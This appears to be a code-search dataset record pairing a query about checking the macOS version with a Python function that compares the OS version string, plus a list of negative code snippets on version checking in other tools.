[ "0.6845686", "0.64684844", "0.64186686", "0.63405824", "0.6296543", "0.6213715", "0.60902375", "0.60629964", "0.60133064", "0.5856874", "0.5762603", "0.57043445", "0.56223327", "0.56172764", "0.55805594", "0.5576068", "0.5568513", "0.5556084", "0.55383843", "0.5527319", "0.5527259", "0.55162597", "0.5487715", "0.54780805", "0.5468831", "0.5442787", "0.5433667", "0.5423802", "0.541526", "0.54051715", "0.53872156", "0.53828967", "0.53602433", "0.5316119", "0.5313921", "0.5311174", "0.5310279", "0.5310252", "0.5303675", "0.5303383", "0.5298816", "0.5296683", "0.5295508", "0.52944064", "0.52924067", "0.52806675", "0.5276805", "0.52539736", "0.5244359", "0.523558", "0.5229628", "0.5228405", "0.52263844", "0.5217105", "0.52035433", "0.5201077", "0.52001286", "0.5185346", "0.5184184", "0.51814616", "0.51612234", "0.5148414", "0.5141066", "0.513786", "0.5132176", "0.51305187", "0.51284426", "0.51167846", "0.51162815", "0.5115532", "0.5111074", "0.508782", "0.5086088", "0.5081827", "0.5079104", "0.50782365", "0.50776225", "0.507494", "0.5070939", "0.505836", "0.50502527", "0.50471985", "0.5043381", "0.5035273", "0.5032975", "0.50285184", "0.5022368", "0.5018452", "0.5003263", "0.49937204", "0.498874", "0.4987062", "0.49863425", "0.49729276", "0.49712515", "0.49681515", "0.49641317", "0.49570674", "0.49566212", "0.4944227" ]
0.7423229
0
Pass a string in the format 'x.x.x'. Will check that this MacOSX version is at least that version. The 3rd micro number is optional
def isOSXVersionAtLeast(compareVersion): # type: (basestring) -> bool try: if not Platform.isOSX(): return False def convertVersion(convertString): _os_major = _os_minor = _os_micro = 0 _versionNumbers = [] for versionPart in StringUtils.splitIntoList(convertString, '.'): strippedPart = StringUtils.stripNonNumbers(versionPart, '.') if (StringUtils.isInteger(strippedPart)): _versionNumbers.append(Integer.valueOf(Integer.parseInt(strippedPart))) else: _versionNumbers.append(0) if len(_versionNumbers) >= 1: _os_major = max(0, _versionNumbers[0]) if len(_versionNumbers) >= 2: _os_minor = max(0, _versionNumbers[1]) if len(_versionNumbers) >= 3: _os_micro = max(0, _versionNumbers[2]) return _os_major, _os_minor, _os_micro os_major, os_minor, os_micro = convertVersion(System.getProperty("os.version", "0.0.0")) myPrint("DB", "MacOS Version number(s): %s.%s.%s" %(os_major, os_minor, os_micro)) if not isinstance(compareVersion, basestring) or len(compareVersion) < 1: myPrint("B", "ERROR: Invalid compareVersion of '%s' passed - returning False" %(compareVersion)) return False chk_os_major, chk_os_minor, chk_os_micro = convertVersion(compareVersion) myPrint("DB", "Comparing against Version(s): %s.%s.%s" %(chk_os_major, chk_os_minor, chk_os_micro)) if os_major < chk_os_major: return False if os_major > chk_os_major: return True if os_minor < chk_os_minor: return False if os_minor > chk_os_minor: return True if os_micro < chk_os_micro: return False return True except: myPrint("B", "ERROR: isOSXVersionAtLeast() failed - returning False") dump_sys_error_to_md_console_and_errorlog() return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_from_version(version: str) -> str:\n version_int = [int(v) for v in version.split(\".\")]\n if version_int[0] not in PipetteModelMajorVersion:\n raise ValueError(f\"Major version {version_int[0]} is not supported.\")\n if version_int[1] not in PipetteModelMinorVersion:\n raise ValueError(f\"Minor version {version_int[1]} is not supported.\")\n return version", "def _is_python_version(s: str) -> bool:\n\n return s.startswith(\"2\") or s.startswith(\"3\")", "def check_version_str(version):\n if not version.startswith('v') and version != 'current':\n version = 'v%s' % version\n return version", "def is_stable_version(version):\n if not isinstance(version, tuple):\n version = version.split('.')\n last_part = version[-1]\n\n if not re.search('[a-zA-Z]', last_part):\n return True\n else:\n return False", "def __check_nm_version(self):\n try:\n proxy = self.bus.get_object(\n self.system_service_name, \"/org/freedesktop/NetworkManager\")\n props = dbus.Interface(proxy, \"org.freedesktop.DBus.Properties\")\n version = props.Get(\"org.freedesktop.NetworkManager\", \"Version\")\n except dbus.exceptions.DBusException:\n version = \"0.8\"\n if re.match(r'^1\\.', version):\n self.nm_version = \"1.0\"\n return\n if re.match(r'^0\\.9', version):\n self.nm_version = \"0.9\"\n return\n if re.match(r'^0\\.8', version):\n self.nm_version = \"0.8\"\n return\n self.nm_version = Messages.unknown_version", "def check_python_version(match, current=None):\n if current is None:\n current = list(sys.version_info[:3])\n if not isinstance(match, list):\n match = [match]\n for m in match:\n minimal = False\n if isinstance(m, float):\n m = str(m)\n if m.endswith(\"+\"):\n minimal = True\n m = m[:-1]\n # assert m[0].isdigit()\n # assert m[-1].isdigit()\n m = [int(x) for x in m.split(\".\")]\n current_len = current[: len(m)]\n # print(m, current, current_len)\n if minimal:\n if current_len >= m:\n return True\n else:\n if current_len == m:\n return True\n return False", "def is_new_osx():\n name = distutils.util.get_platform()\n if sys.platform != \"darwin\":\n return False\n elif name.startswith(\"macosx-10\"):\n minor_version = int(name.split(\"-\")[1].split(\".\")[1])\n if minor_version >= 7:\n return True\n else:\n return False\n else:\n return False", "def test_osx_version_number_value(self):\n \n running_version_number = get_osx_version()[0]\n \n # Check to make sure the returned valued is 10.11.1\n self.assertEqual(running_version_number, '10.11.1')", "def version_check(version):\n return {\n 1: 'OF10', # 0x01 -> OF1.0\n 3: 'OF12', # 0x03 -> OF1.2\n 4: 'OF13', # 0x04 -> OF1.3\n 5: 'OF14', # 0x05 -> OF1.4\n 6: 'OF15', # 0x06 -> OF1.5\n }.get(version, 0)", "def os_is_compatible(required_os_version: str) -> bool:\n\tcurrent_version = [int(c) for c in os_release().split('.')]\n\trequired_version = [int(c) for c in required_os_version.split('.')]\n\n\t# 10.13.6.2 is not (necessarily) compatible with 10.13.6\n\tif len(required_version) > len(current_version) and\\\n\t required_version[0:len(current_version)] == current_version:\n\t return False\n\n\t# Compare versions component-wise\n\tfor (c, r) in zip(current_version, required_version):\n\t\tif c < r:\n\t\t\treturn False\n\n\treturn True", "def testStratisVersion(self):\n version = Manager.Properties.Version.Get(get_object(TOP_OBJECT))\n (major, _, _) = version.split(\".\")\n self.assertEqual(major, \"0\")", "def check_pythonver(reqver_text):\n\treqver = map(int, reqver_text.split('.'))\n\tpythonver = sys.version_info[:3]\n\treturn check_ver(pythonver, 
reqver)", "def test_version():\n versions = ((2, 7, 16), (3, 5, 7), (3, 6, 8), (3, 7, 3))\n assert sys.version_info[:3] in versions", "def version_major_minor(version_string):\n return '.'.join(version_string.split('.')[0:2])", "def check_version_is_supported(name, version, min_version, help=''):\n if (pkg_resources.parse_version(version) <\n pkg_resources.parse_version(min_version)):\n # Version is too old.\n print('ERROR: Unsupported %s version: %s (minimum %s).%s' %\n (name, version, min_version, (' %s' % help) if help else ''),\n file=sys.stderr)\n exit(1)", "def check_if_version_supports_restricted(operator_version):\n try:\n the_version = operator_version.split(\"-\")[0]\n\n parts = the_version.split(\".\")\n if int(parts[0]) < 6:\n return False\n if int(parts[0]) >= 7:\n return True\n if int(parts[1]) > 2:\n return True\n if int(parts[1]) < 2:\n return False\n return int(parts[2]) >= 18\n # pylint: disable=W0703\n except Exception:\n logger.info(\"issues parsing version %s\", operator_version)\n return True", "def verify_ios_versionNumber():\r\n msg = \"\"\r\n try:\r\n 'Getting Version number for IOS '\r\n if g.platform == 'ios':\r\n text_view = ui_controls.text_view(get_obj_identifier('about_versionNumber_lbl'), label=True)\r\n\r\n 'Verifying whether Version number is matching with expected value IOS'\r\n if g.platform == 'ios' and text_view.strip() == g.version_number :\r\n print \"Version number is verified successfully. Expected : %s. Actual : %s\" % (g.version_number,text_view.strip())\r\n else:\r\n if g.platform == 'ios':\r\n print \"Version number is not verified successfully. Expected : %s. Actual : %s\" % (g.version_number, text_view.strip())\r\n return False, msg\r\n except Exception as excp:\r\n traceback.print_exc()\r\n msg += str(excp)\r\n return True, msg", "def test__get_program_version():\n version = util._get_program_version(\"midgard\")\n assert isinstance(version, str) and re.search(\"[0-9]\", version)", "def python_version_check():\n min_version_list = PYTHON_MIN_VERSION.split(\".\")\n # Truncate if the list is more the 4 items\n if len(min_version_list) > 4:\n min_version_list = min_version_list[:4]\n # Fill if the list is less then 4 items\n if len(min_version_list) == 1:\n min_version_list.append(\"0\")\n if len(min_version_list) == 2:\n min_version_list.append(\"0\")\n if len(min_version_list) == 3:\n min_version_list.append(\"f0\")\n # Calculate the minimum version and an integer, which, when displayed as\n # hex, is easily recognised as the version. E.g. 0x30502f0 is 3.5.2\n min_version_value = 0\n for index, item in enumerate(min_version_list[::-1]):\n min_version_value = min_version_value + int(item, 16) * 2**(index * 8)\n if debug: print(\"Python Version Minimum:{}, Decimal:{}, Hex:{}\"\n .format(PYTHON_MIN_VERSION, min_version_value,\n hex(min_version_value)))\n # test value and exit if below minimum revision\n if sys.hexversion < min_version_value:\n print(\"Python Version: {}. Required minimum version is: {}. 
Exiting...\"\n .format(sys.version.split(\" \")[0], PYTHON_MIN_VERSION))\n sys.exit()", "def test_osx_version_number_type(self):\n \n running_version_number = get_osx_version()[0]\n \n # Check to make sure the returned valued is a string\n self.assertEqual(type(running_version_number), str)", "def test_major(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n new_version_parts[0] = int(new_version_parts[0]) + 1\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is False", "def check_py_version(self, cur_version):\n\n # convert cur_version to string, in case of erroneous type being passed\n cur_version = str(cur_version)\n\n acceptable_python_versions_regex = r\"(^(2\\.[6-9])(\\.?\\d{1,2})?$)|(^(3\\.[3-9])(\\.?\\d{1,2})?$)\"\n pyversions_regex_compiled = re.compile(acceptable_python_versions_regex)\n pyversions_match = pyversions_regex_compiled.match(cur_version)\n\n # If match is found, return True. If no match, return False\n if pyversions_match:\n return True\n else:\n return False", "def check_version(ctx, _, value):\n if not value or ctx.resilient_parsing:\n return\n\n click.echo(f\"geocube v{importlib.metadata.version('geocube')}\")\n\n ctx.exit()", "def is_version_2_6() -> bool:\n v = get_version()\n if v[1] != \"singularity\" and v[1] != \"singularity-ce\":\n return False\n return v[0][0] == 2 and v[0][1] == 6", "def get_version():\n # this implementation avoids calling Foundation and will work on\n # non Apple OSes.\n vers = \"UNKNOWN\"\n build = \"\"\n # find the munkilib directory, and the version file\n munkilibdir = os.path.dirname(os.path.abspath(__file__))\n versionfile = os.path.join(munkilibdir, \"version.plist\")\n if os.path.exists(versionfile):\n try:\n vers_plist = readPlist(versionfile)\n except (IOError, OSError, ExpatError):\n pass\n else:\n try:\n vers = vers_plist['CFBundleShortVersionString']\n build = vers_plist['BuildNumber']\n except KeyError:\n pass\n if build:\n vers = vers + \".\" + build\n return vers", "def test_versionString(self):\n self.assertIn(\"%d.%d.%d\" % nevow.__version_info__, nevow.__version__)", "def test_major(self):\n self.assertEqual(\"0\", self._version1.major())\n self.assertEqual(\"1.2\", self._version2.major())", "def _validate_os(module):\n rc, out, err = module.run_command(['cat', '/etc/os-release'])\n\n # Validate for a BSD string in output\n if 'BSD' not in out:\n msg_err = 'Error: Unsupported OS. 
This can only be used on BSD systems.'\n module.fail_json(msg=msg_err)", "def is_version_3_1_or_newer() -> bool:\n if is_apptainer_1_or_newer():\n return True # this is equivalent to singularity-ce > 3.9.5\n v = get_version()\n return v[0][0] >= 4 or (v[0][0] == 3 and v[0][1] >= 1)", "def test_valid_hh_version():\n # TODO: Basically only enforcing correct main segment, since not using `re.fullmatch`\n # TODO: Probably want `re.fullmatch` here - Currently ignoring any potentially invalid suffix\n version_pattern = r\"^[0-9]+\\.[0-9]+\\.[0-9]+(|a[0-9]|b[0-9]|rc[0-9])\"\n res = re.match(version_pattern, hh.__version__)\n assert res is not None", "def _is_version_uptodate(self):\n logging.info(\"Checking tesseract version\")\n cmd = '%s -v' % (self.binary)\n logging.info(cmd) \n try:\n ret_output = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)\n except CalledProcessError:\n # Could not run tesseract\n error(self.msgs['TS_MISSING'])\n\n ver_str = '0.0.0'\n for line in ret_output.splitlines():\n if 'tesseract' in line:\n ver_str = line.split(' ')[1]\n if ver_str.endswith('dev'): # Fix for version strings that end in 'dev'\n ver_str = ver_str[:-3]\n\n # Iterate through the version dots\n ver = [int(x) for x in ver_str.split('.')]\n req = [int(x) for x in self.required.split('.')]\n\n # Aargh, in windows 3.02.02 is reported as version 3.02 \n # SFKM\n if str(os.name) == 'nt':\n req = req[:2]\n\n version_good = False\n for i,num in enumerate(req):\n if len(ver) < i+1:\n # This minor version number is not present in tesseract, so it must be\n # lower than required. (3.02 < 3.02.01)\n break\n if ver[i]==num and len(ver) == i+1 and len(ver)==len(req):\n # 3.02.02 == 3.02.02\n version_good = True\n continue\n if ver[i]>num:\n # 4.0 > 3.02.02\n # 3.03.02 > 3.02.02\n version_good = True\n break\n if ver[i]<num:\n # 3.01.02 < 3.02.02\n break\n \n return version_good, ver_str", "def _check_version(version):\n # Update cache if needed.\n if _check_version._versions_cache is None:\n log.debug(\"Loading versions cache ...\")\n _check_version._versions_cache = __salt__[\"netbeans.list_versions\"]()\n\n # Convert latest.\n if version is None or version == \"latest\":\n return __salt__[\"netbeans.pick_latest_version\"](\n _check_version._versions_cache\n )\n\n # Check if version is available.\n if version not in _check_version._versions_cache:\n return None\n return version", "def ipbb_version_t(version):\n if not re.match(r'^\\d\\.\\d\\.\\d+$', version):\n raise ValueError(\"not a valid IPBB version: '{version}'\".format(**locals()))\n return version", "def getOsVersion():\n os_version_tuple = platform.mac_ver()[0].split('.')\n return int(os_version_tuple[1])", "def check_os():\n\n if platform.system() != \"Darwin\":\n print \"This script only works on macos system\"\n exit(1)", "def is_version_3_or_newer() -> bool:\n if is_apptainer_1_or_newer():\n return True # this is equivalent to singularity-ce > 3.9.5\n v = get_version()\n return v[0][0] >= 3", "def test_minor(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n new_version_parts[1] = int(new_version_parts[1]) + 1\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is True", "def test_parse_version():\n version = VersionUtils.parse_version('9.5.3')\n assert version == VersionInfo(9, 5, 3)\n\n # Test #.# style versions\n v10_2 = VersionUtils.parse_version('10.2')\n assert v10_2 == VersionInfo(10, 2, 0)\n\n v11 = VersionUtils.parse_version('11')\n assert v11 == VersionInfo(11, 0, 0)\n\n # Test 
#beta# style versions\n beta11 = VersionUtils.parse_version('11beta3')\n assert beta11 == VersionInfo(11, 0, 0, prerelease='beta.3')\n\n assert v10_2 < beta11\n assert v11 > beta11\n\n # Test #rc# style versions\n version = VersionUtils.parse_version('11rc1')\n assert version == VersionInfo(11, 0, 0, prerelease='rc.1')\n\n # Test #nightly# style versions\n version = VersionUtils.parse_version('11nightly3')\n assert version == VersionInfo(11, 0, 0, 'nightly.3')\n\n v12_3_tde = VersionUtils.parse_version('12.3_TDE_1.0')\n assert v12_3_tde == VersionInfo(12, 3, 0)", "def test_rtax_supported_version(self):\r\n acceptable_version = [(0, 984)]\r\n self.assertTrue(which('rtax'),\r\n \"rtax not found. This may or may not be a problem depending on \" +\r\n \"which components of QIIME you plan to use.\")\r\n command = \"rtax 2>&1 > %s | grep Version | awk '{print $2}'\" % devnull\r\n proc = Popen(command, shell=True, universal_newlines=True,\r\n stdout=PIPE, stderr=STDOUT)\r\n stdout = proc.stdout.read()\r\n version_string = stdout.strip()\r\n try:\r\n version = tuple(map(int, version_string.split('.')))\r\n pass_test = version in acceptable_version\r\n except ValueError:\r\n pass_test = False\r\n version_string = stdout\r\n self.assertTrue(pass_test,\r\n \"Unsupported rtax version. %s is required, but running %s.\"\r\n % ('.'.join(map(str, acceptable_version)), version_string))", "def get_version():\n return '%d.%d.%d' % version_info", "def version_match(required, candidate):\n return _discover.version_match(required, candidate)", "def version(harness_string):\n lines = harness_string.split(\"\\n\")\n version_string = lines[1][11:]\n return [int(x) for x in version_string.split(\".\")]", "def get_min_cli_version(k8s_cli):\n return MIN_OC_VERSION_SUPPORT_RETRIES if (k8s_cli and k8s_cli.endswith(OC_K8S_CLI))\\\n else MIN_KUBECTL_VERSION_SUPPORT_RETRIES", "def find_xcode_major_version():\n cmd = ['xcodebuild', '-version']\n command_trace.log(cmd)\n\n result = str(subprocess.check_output(cmd))\n version = result.split('\\n', 1)[0]\n version = re.sub(r'Xcode ', '', version)\n version = re.sub(r'\\..*', '', version)\n return int(version)", "def test_version(self):\n v = version('/no/such/executable')\n self.assertEqual(v, '0.0.1.dev0')\n v = version('false')\n self.assertEqual(v, '0.0.1.dev0')\n v = version('echo')\n self.assertEqual(v, 'describe .devrev-list --count HEAD')", "def check_version(min_version: str,\n warning_only: bool = False,\n library: Optional[ModuleType] = None):\n # pylint: disable=import-outside-toplevel\n from .. 
import __version__\n if library is None:\n version = __version__\n name = 'GluonNLP'\n else:\n version = library.__version__\n name = library.__name__\n from packaging.version import parse\n bad_version = parse(version.replace('.dev', '')) < parse(min_version)\n if bad_version:\n msg = 'Installed {} version {} does not satisfy the ' \\\n 'minimum required version {}'.format(name, version, min_version)\n if warning_only:\n warnings.warn(msg)\n else:\n raise AssertionError(msg)", "def get_version_for(self,platform,version):\n def supports_platform(test_platforms):\n if test_platforms.upper() in ['ALL','ANY']:\n platforms = PLATFORMS\n else:\n platforms = test_platforms.split(':')\n return platform in platforms\n\n # Minimal required version check (for mainline releases)\n if self.min_versions:\n base_version = '.'.join(version.split('.')[:2])\n for base_min_version, min_version in (('.'.join(x.split('.')[:2]),x)\n for x in self.min_versions.split(';')):\n if compare_versions(base_version,base_min_version) == 0:\n if compare_versions(version,min_version) < 0:\n return None\n # Find the suitable test version\n candidate = '0'\n test = None\n for t in (t for t in self.versions if supports_platform(t.platform)):\n if compare_versions(version,t.firebird_version) >= 0:\n if compare_versions(candidate,t.firebird_version) < 0:\n candidate = t.firebird_version\n test = t\n return test", "def py_versiontest(c):\n pass", "def test_osx_version_name_value(self):\n \n running_version_name = get_osx_version()[1]\n \n # Check to make sure the returned valued is 10.11.1\n self.assertEqual(running_version_name, 'El Capitan')", "def getversion():\r\n\r\n global VERSION\r\n\r\n if len(VERSION) == 3:\r\n return '{}.{}.{}'.format(VERSION[0], VERSION[1], VERSION[2])\r\n else:\r\n return '{}.{}.{}-{}'.format(VERSION[0], VERSION[1], VERSION[2], VERSION[3])", "def get_major_version(version):\n parsed_version = version.split('.')\n return '.'.join(parsed_version[0:2])", "def get_os_match(host):\n for h in host:\n os_match = h.osmatch\n if os_match is not None:\n os_match = str(os_match)\n return os_match.split('\"')[1].split('\"')[0]\n else:\n return \"No OS version available.\"", "def is_version_3_4_or_newer() -> bool:\n if is_apptainer_1_or_newer():\n return True # this is equivalent to singularity-ce > 3.9.5\n v = get_version()\n return v[0][0] >= 4 or (v[0][0] == 3 and v[0][1] >= 4)", "def test_usearch_supported_version(self):\r\n acceptable_version = [(5, 2, 236), (5, 2, 236)]\r\n self.assertTrue(which('usearch'),\r\n \"usearch not found. This may or may not be a problem depending on \" +\r\n \"which components of QIIME you plan to use.\")\r\n command = \"usearch --version\"\r\n proc = Popen(command, shell=True, universal_newlines=True,\r\n stdout=PIPE, stderr=STDOUT)\r\n stdout = proc.stdout.read()\r\n version_string = stdout.split('v')[1]\r\n try:\r\n version = tuple(map(int, version_string.split('.')))\r\n pass_test = version in acceptable_version\r\n except ValueError:\r\n pass_test = False\r\n version_string = stdout\r\n self.assertTrue(pass_test,\r\n \"Unsupported usearch version. 
%s is required, but running %s.\"\r\n % ('.'.join(map(str, acceptable_version)), version_string))", "def python_compatible():\n result = False\n req_ver = vers.convert('3.9.5')\n pythonver = vers.convert('{major}.{minor}.{micro}'.format(major=sys.version_info.major,\n minor=sys.version_info.minor,\n micro=sys.version_info.micro))\n\n result = pythonver >= req_ver\n\n return result", "def detect_version_str(self):\n c3d_bin_path = op.dirname(self.locate_command())\n if platform.system() == 'Linux':\n libname = os.listdir(op.join(c3d_bin_path, '..', 'lib'))[0]\n version_str = libname.split('-')[-1]\n elif platform.system() == 'Darwin':\n info_list_path = op.join(c3d_bin_path, '..', 'Info.plist')\n info_etree = xml.etree.ElementTree.parse(info_list_path)\n elem_bodies = [e.text for e in info_etree.iter()]\n version_str = elem_bodies[\n elem_bodies.index('CFBundleShortVersionString') + 1]\n else:\n raise ArcanaVersionNotDetectableError(\n \"Can't detect c3d version on Windows\")\n return version_str", "def test_pre_release(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n if len(new_version_parts) > 4:\n new_version_parts[4] = int(new_version_parts[4]) + 1\n elif len(new_version_parts) > 3:\n new_version_parts.append(1)\n else:\n new_version_parts.extend(['a', 1])\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is True", "def test_osx_version_name_type(self):\n \n running_version_name = get_osx_version()[1]\n \n # Check to make sure the returned valued is a string\n self.assertEqual(type(running_version_name), str)", "def is_macosx():\n (sysname, nodename, release, version, machine) = os.uname()\n return sysname == 'Darwin'", "def test_get_simulator_runtime_by_version(self, _, _2):\n self.assertEqual(\n 'com.apple.CoreSimulator.SimRuntime.iOS-13-2',\n iossim_util.get_simulator_runtime_by_version(\n iossim_util.get_simulator_list(), '13.2.2'))", "def validate_required_python_version_running(minimal_required_version: str) -> None:\n try:\n parts = minimal_required_version.split(\".\")\n min_py_version = 1000000*int(parts[0]) + 1000*(int(parts[1]) if len(parts) > 1 else 0) + (int(parts[2]) if len(parts) > 2 else 0)\n running_py_version = 1000000*sys.version_info.major + 1000*sys.version_info.minor + sys.version_info.micro\n if running_py_version < min_py_version:\n raise RuntimeError(\"\")\n except:\n raise RuntimeError(f\"Kqlmagic requires python >= {Constants.MINIMAL_PYTHON_VERSION_REQUIRED}, you use python {sys.version}\")", "def check_pkgcfg_ver(reqver_text, pkgname):\n\treqver = map(int, reqver_text.split('.'))\n\tpkgcmd = os.popen(pkg_config_path +\n ' pkg-config --modversion ' + pkgname, 'r')\n\tpkgcmd_text = pkgcmd.read()\n\tpkgcmd.close()\n\tmatch = re.search(r'^([0-9]+)\\.([0-9]+)\\.([0-9]+)', pkgcmd_text)\n\tif match:\n\t\tpkgver_str = match.groups()\n\t\tpkgver = map(int, pkgver_str)\n\t\treturn check_ver(pkgver, reqver)\n\telse:\n\t\treturn '<not found>'", "def is_version_valid(version):\n return _compiled_version_regex.match(version) is not None", "def is_dev(version):\n return re.match(r'^.*\\.dev\\d+$', version)", "def test_raxmlHPC_supported_version(self):\r\n acceptable_version = [(7, 3, 0), (7, 3, 0)]\r\n self.assertTrue(which('raxmlHPC'),\r\n \"raxmlHPC not found. 
This may or may not be a problem depending on \" +\r\n \"which components of QIIME you plan to use.\")\r\n command = \"raxmlHPC -v | grep version\"\r\n proc = Popen(command, shell=True, universal_newlines=True,\r\n stdout=PIPE, stderr=STDOUT)\r\n stdout = proc.stdout.read()\r\n version_string = stdout.strip().split(' ')[4].strip()\r\n try:\r\n version = tuple(map(int, version_string.split('.')))\r\n pass_test = version in acceptable_version\r\n except ValueError:\r\n pass_test = False\r\n version_string = stdout\r\n self.assertTrue(pass_test,\r\n \"Unsupported raxmlHPC version. %s is required, but running %s.\"\r\n % ('.'.join(map(str, acceptable_version)), version_string))", "def valid_suffix(suffix):\n suffix = suffix.strip()\n if not suffix:\n return suffix\n allowed = set('.dev0123456789')\n disallowed = set(suffix).difference(allowed)\n if disallowed:\n disallowed = ''.join(sorted(disallowed))\n raise ValueError('Version suffix contains disallowed characters'\n ' (%(disallowed)s)'\n % locals())\n chunks = suffix.split('.')\n chunk = chunks.pop(0)\n if chunk:\n raise ValueError('Version suffix must start with \".\"'\n ' (%(suffix)r)'\n % locals())\n if not chunks:\n raise ValueError('Version suffix is too short'\n ' (%(suffix)r)'\n % locals())\n for chunk in chunks:\n if not chunk:\n raise ValueError('Empty chunk %(chunk)r in '\n 'version suffix %(suffix)r'\n % locals())\n char = chunk[0]\n if char in '0123456789':\n raise ValueError('Chunk %(chunk)r of version suffix %(suffix)r'\n ' starts with a digit'\n % locals())\n char = chunk[-1]\n if char not in '0123456789':\n raise ValueError('Chunk %(chunk)r of version suffix %(suffix)r'\n ' doesn\\'t end with a digit'\n % locals())\n return suffix # ... valid_suffix\n # ... get the version ...\n # ... get the version ...", "def test_uclust_supported_version(self):\r\n acceptable_version = (1, 2, 22)\r\n self.assertTrue(which('uclust'),\r\n \"uclust not found. This may or may not be a problem depending on \" +\r\n \"which components of QIIME you plan to use.\")\r\n command = 'uclust --version'\r\n proc = Popen(command, shell=True, universal_newlines=True,\r\n stdout=PIPE, stderr=STDOUT)\r\n stdout = proc.stdout.read()\r\n version_string = stdout.strip().split('v')[-1].strip('q')\r\n try:\r\n version = tuple(map(int, version_string.split('.')))\r\n pass_test = version == acceptable_version\r\n except ValueError:\r\n pass_test = False\r\n version_string = stdout\r\n self.assertTrue(pass_test,\r\n \"Unsupported uclust version. 
%s is required, but running %s.\"\r\n % ('.'.join(map(str, acceptable_version)), version_string))", "def contracts_version_monitoring_service_takes_token_network_registry(\n version: Optional[str],\n) -> bool:\n if version is None:\n # stock version in `data`\n return True\n return VersionInfo.parse(version).compare(\"0.22.0\") > 0", "def _version_to_shorthand(version):\n parts = version.split('.')\n if len(parts) != 2 and len(parts) != 3:\n tmpl = 'Version string must be like X.Y or X.Y.Z, not `{}`'\n raise ValueError(tmpl.format(version))\n return parts[0] + parts[1]", "def test_package_version():\n coverage_version = package_version('coverage')\n pytest_version = package_version('pytest')\n\n assert coverage_version is not None\n assert coverage_version < (1000, 0, 0)\n assert pytest_version is not None\n assert pytest_version > (5, 0)", "def version_number() -> int:\n return 0", "def test(self,version=''):\n p5cmd = ['srvinfo', 'lexxvers']\n try:\n res = self.nsdchat_call(p5cmd,5)\n p5_version = singlevalue(res)\n if (p5_version >= str(version)):\n return True\n return False\n except subprocess.TimeoutExpired:\n print(\"Could not connect to the archiware p5 server.\\nPlease review\"\n \"the connection and firewall settings.\")\n raise", "def get_major_version(version):\n return str(check_version(version)[0])", "def test__print_version(capsys):\n util._print_version(\"midgard\")\n version, _ = capsys.readouterr()\n assert isinstance(version, str) and re.search(\"[0-9]\", version)", "def protocol(ver):\r\n if ver == 1:\r\n return 1\r\n\r\n if ver == 2:\r\n return 2\r\n\r\n\r\n raise ValueError", "def test_get_python_version():\n assert re.match(\"^[a-zA-Z0-9_]+, version [0-9.]+\", util.get_python_version())", "def _GetSystemVersion(self, component, info):\n # Check if we are on mario, then we need to use the legacy parser\n if self.ChromeOSBoard() == 'x86-mario':\n return self._GetSystemVersionMario(component, info)\n items = info.strip().splitlines()\n # This is going to give us a list of lines, we are looking for the\n # following ones:\n # BIOS version: board.xx.xx.xxx.xxx.xx\n # EC version: foobar\n for line in items:\n line_components = line.split(':')\n # The line we are looking for has at least 2 items\n if len(line_components) >= 2 and line_components[0] == component:\n return line_components[1].strip()\n self.fail('Could not locate the following item %s in the return value '\n 'of chromeos-firmwareupdate.' 
% component)", "def have_compatible_glibc(major, minimum_minor):\n import ctypes # pylint: disable=bad-option-value,import-outside-toplevel\n\n process_namespace = ctypes.CDLL(None)\n try:\n gnu_get_libc_version = process_namespace.gnu_get_libc_version\n except AttributeError:\n # Symbol doesn't exist -> therefore, we are not linked to\n # glibc.\n return False\n\n # Call gnu_get_libc_version, which returns a string like \"2.5\".\n gnu_get_libc_version.restype = ctypes.c_char_p\n version_str = gnu_get_libc_version()\n # py2 / py3 compatibility:\n if not isinstance(version_str, str):\n version_str = version_str.decode(\"ascii\")\n\n # Parse string and check against requested version.\n version = [int(piece) for piece in version_str.split(\".\")]\n assert len(version) == 2\n if major != version[0]:\n return False\n if minimum_minor > version[1]:\n return False\n return True", "def verify_Version_buildNumber():\r\n msg, flag = \"\", False\r\n try:\r\n 'Getting Build number for IOS '\r\n if g.platform == 'ios':\r\n flag1, msg1 = verify_ios_versionNumber()\r\n msg += msg1\r\n flag2, msg2 = verify_ios_buildNumber()\r\n msg += msg2\r\n 'go back'\r\n flag3=ui_controls.image(get_obj_identifier('about_back_btn'))\r\n print 'cliked on back button'\r\n flag = False if not (flag1 and flag2 and flag3) else True\r\n else:\r\n text_view = ui_controls.text_view(get_obj_identifier('about_buildVersion_lbl'))\r\n \r\n if text_view.strip() == g.android_version_no.strip():\r\n \r\n print \"Version and Build number matched. Expected : %s. Actual : %s\" % (g.android_version_no, text_view.strip())\r\n flag = True \r\n else:\r\n \r\n print \"Version and Build number does not match. Expected : %s. Actual : %s\" % (g.android_version_no, text_view.strip())\r\n flag1=ui_controls.back_button()\r\n \r\n flag = False if not (flag1) else True\r\n except Exception as excp:\r\n traceback.print_exc()\r\n msg += str(excp)\r\n return flag, msg", "def test_version(self, parse_input):\n bb = parse_input(\"name testname\\nversion 1.0\")\n assert bb.version == \"1.0\"\n\n bb = parse_input(\"name testname\\nversion 1.12\")\n assert bb.version == \"1.12\"", "def test_pynast_suported_version(self):\r\n min_acceptable_version = (1, 2)\r\n max_acceptable_version = (1, 2, 2)\r\n try:\r\n from pynast import __version__ as pynast_lib_version\r\n version = pynast_lib_version.split('.')\r\n if version[-1][-4:] == '-dev':\r\n version[-1] = version[-1][:-4]\r\n version = tuple(map(int, version))\r\n pass_test = (version >= min_acceptable_version and\r\n version <= max_acceptable_version)\r\n version_string = str(pynast_lib_version)\r\n except ImportError:\r\n pass_test = False\r\n version_string = \"Not installed\"\r\n\r\n min_version_str = '.'.join(map(str, min_acceptable_version))\r\n max_version_str = '.'.join(map(str, max_acceptable_version))\r\n error_msg = (\"Unsupported pynast version. 
